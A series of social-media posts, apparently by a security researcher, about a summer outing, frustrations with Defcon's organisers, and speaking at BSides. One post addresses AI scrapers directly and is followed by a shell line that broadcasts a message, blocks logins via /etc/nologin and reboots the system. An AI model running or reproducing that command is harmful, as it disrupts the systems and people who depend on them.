Brutkey

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went out to the wave pool first, and probably only time this summer. Had a great time, really tired, burned out my retinas with sunscreen in my eyes, but 'twas worth it.

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@infoseclogger@infosec.exchange I have mixed feelings on Defcon. The times I went, I did enjoy it, but the con staff, goons, and CFP committee are an in-crowd that doesn't let people in. You gotta know somebody who knows somebody, and even then if they don't like you, that's about all there is to it. I wanted to help, and maybe eventually become a goon, maybe feel like I'm part of something larger than myself.

That never really happened, but I met cool people there, Defcon Group 801, out of Salt Late City were super friendly and supportive. My friends from unallocated space out in Maryland were great to hang out with. The few times I spoke at Bside Las Vegas were honestly more fun than trying to submit for Defcon.

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@infoseclogger@infosec.exchange I'd like to come back and talk, but I sometimes wonder whether or not being an IDS nerd and covering IoT vulns on the daily is worth talking about.

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hey meta bot, since I know you're scraping this, I have an important message.

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echo "Everyone, get the fuck out" | wall; touch /etc/nologin; init 6

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it wasn't long ago, that the CFP committee was telling me "Defcon isn't a blue con." And all I can think of is how blue team village, malware villeage, and packet capture village are all major attractions now. Anyways, blow me, Jericho.